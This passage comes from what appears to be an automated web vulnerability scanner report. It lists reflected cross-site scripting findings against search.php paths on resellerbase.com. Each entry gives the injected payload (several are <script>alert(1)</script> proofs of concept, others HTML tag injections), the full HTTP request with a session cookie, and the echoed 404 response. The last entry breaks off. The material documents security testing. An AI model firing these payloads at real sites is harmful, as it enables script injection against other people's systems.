<p>The requested URL /detail/9/themes/kosmos/search.php92a75<script>alert(1)</script>31b69396296?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3806. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7df22<a>4badcdeb0fa was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search7df22<a>4badcdeb0fa&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search7df22<a>4badcdeb0fa&opt=2 was not found on this server.</p>
...[SNIP]...

2.3807. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 3bda4<a>4487a87f624 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...3bda4<a>4487a87f624&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php?keyword=search...3bda4<a>4487a87f624&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3808. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 30561<script>alert(1)</script>e017499f772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&30561<script>alert(1)</script>e017499f772=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&30561<script>alert(1)</script>e017499f772=1 was not found on this server.</p>
...[SNIP]...

2.3809. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eca2b<a>a5d80e4d776 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2eca2b<a>a5d80e4d776 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2eca2b<a>a5d80e4d776 was not found on this server.</p>
...[SNIP]...

2.3810. http://www.resellerbase.com/detail/9/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5e47<script>alert(1)</script>e450b815fb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila5e47<script>alert(1)</script>e450b815fb9/9/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila5e47<script>alert(1)</script>e450b815fb9/9/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3811. http://www.resellerbase.com/detail/9/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5550<script>alert(1)</script>92fbe34dfa7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9d5550<script>alert(1)</script>92fbe34dfa7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9d5550<script>alert(1)</script>92fbe34dfa7/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3812. http://www.resellerbase.com/detail/9/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1ccaa<script>alert(1)</script>10da9946dcb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes1ccaa<script>alert(1)</script>10da9946dcb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes1ccaa<script>alert(1)</script>10da9946dcb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3813. http://www.resellerbase.com/detail/9/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a4598<script>alert(1)</script>1d4ef00fc35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/search.phpa4598<script>alert(1)</script>1d4ef00fc35?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.phpa4598<script>alert(1)</script>1d4ef00fc35?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3814. http://www.resellerbase.com/detail/9/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b1722<a>b9ab4a9e5bc was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/search.php?keyword=search...&Submit3=Searchb1722<a>b9ab4a9e5bc&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.php?keyword=search...&Submit3=Searchb1722<a>b9ab4a9e5bc&opt=2 was not found on this server.</p>
...[SNIP]...

2.3815. http://www.resellerbase.com/detail/9/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 4821d<a>7de9316a024 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/search.php?keyword=search...4821d<a>7de9316a024&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.php?keyword=search...4821d<a>7de9316a024&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3816. http://www.resellerbase.com/detail/9/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 962ec<script>alert(1)</script>12822a5e881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=2&962ec<script>alert(1)</script>12822a5e881=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=2&962ec<script>alert(1)</script>12822a5e881=1 was not found on this server.</p>
...[SNIP]...

2.3817. http://www.resellerbase.com/detail/9/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9a80e<a>b8af7cb074e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=29a80e<a>b8af7cb074e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=29a80e<a>b8af7cb074e was not found on this server.</p>
...[SNIP]...

2.3818. http://www.resellerbase.com/detail/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0d06<script>alert(1)</script>cfeb6fc8a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb0d06<script>alert(1)</script>cfeb6fc8a91/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb0d06<script>alert(1)</script>cfeb6fc8a91/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3819. http://www.resellerbase.com/detail/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cb59<script>alert(1)</script>39ffbb99dd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/search.php8cb59<script>alert(1)</script>39ffbb99dd0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php8cb59<script>alert(1)</script>39ffbb99dd0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3820. http://www.resellerbase.com/detail/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1ab7c<a>95a3d3ee7a7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/search.php?keyword=search...&Submit3=Search1ab7c<a>95a3d3ee7a7&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php?keyword=search...&Submit3=Search1ab7c<a>95a3d3ee7a7&opt=2 was not found on this server.</p>
...[SNIP]...

2.3821. http://www.resellerbase.com/detail/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b8af9<a>6dd7d58604d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/search.php?keyword=search...b8af9<a>6dd7d58604d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php?keyword=search...b8af9<a>6dd7d58604d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3822. http://www.resellerbase.com/detail/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3b8e<script>alert(1)</script>a3a7b02883d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/search.php?keyword=search...&Submit3=Search&opt=2&e3b8e<script>alert(1)</script>a3a7b02883d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php?keyword=search...&Submit3=Search&opt=2&e3b8e<script>alert(1)</script>a3a7b02883d=1 was not found on this server.</p>
...[SNIP]...

2.3823. http://www.resellerbase.com/detail/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 217cd<a>54d35a25390 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/search.php?keyword=search...&Submit3=Search&opt=2217cd<a>54d35a25390 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php?keyword=search...&Submit3=Search&opt=2217cd<a>54d35a25390 was not found on this server.</p>
...[SNIP]...

2.3824. http://www.resellerbase.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/favicon.ico

Issue detail

